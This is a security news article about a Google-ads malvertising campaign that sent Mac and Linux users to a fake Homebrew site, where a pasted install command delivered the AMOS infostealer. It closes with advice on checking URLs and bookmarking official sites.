Cybercriminals are using Google ads to spread malware by directing Mac and Linux users to a fake Homebrew website with an infostealer.
This malware campaign is designed to steal sensitive information, including credentials, browser data, and cryptocurrency wallets.
The information stealer in question, AmosStealer (or Atomic), was discovered by security expert Ryan Chenkie, who raised the alarm on X about this campaign and its potential risks.
Specifically tailored for macOS systems, this information stealer is sold to cyber criminals on a subscription basis for $1,000 per month.
For those unaware, Homebrew is a free and open-source software package management system that simplifies the installation of software on Apple’s operating systems, macOS and Linux.
However, it has recently become a focal point for malvertising campaigns promoting fake Google Meet pages.
Hackers used a deceptive Google advertisement that displayed the legitimate Homebrew URL, “brew.sh,” tricking unsuspecting users into clicking it.
It then redirected users to a fake site hosted at “brewe.sh” which mimicked the real one. It instructed visitors to install Homebrew by running a command in their Terminal or a Linux shell prompt from the fake website, which, upon execution, installed malware instead of the legitimate software on the device.
Security researcher JAMESWT identified the malware dropped in this case as Amos, a potent information stealer capable of targeting over 50 cryptocurrency extensions, desktop wallets, and web browser data.
Homebrew’s project leader, Mike McQuaid, acknowledged the issue and expressed frustration over Google’s inability to prevent these scams.
“This seems taken down now. But it keeps happening again and again, and Google appears to prioritize revenue from scammers. Please share this widely so Google can address it permanently,” McQuaid tweeted.
Although the malicious ad has been removed, the threat remains, as hackers can use other redirection domains to continue their campaigns.
Homebrew users are advised to exercise caution when clicking on Google-sponsored ads and verify that they are visiting the official websites of a project or company before downloading software or entering sensitive information.
To protect themselves from potential risks, users should bookmark the official websites of trusted projects like Homebrew and access them directly.
They should also avoid clicking on sponsored ads for software downloads and double-check URLs to ensure they match the legitimate site before proceeding.
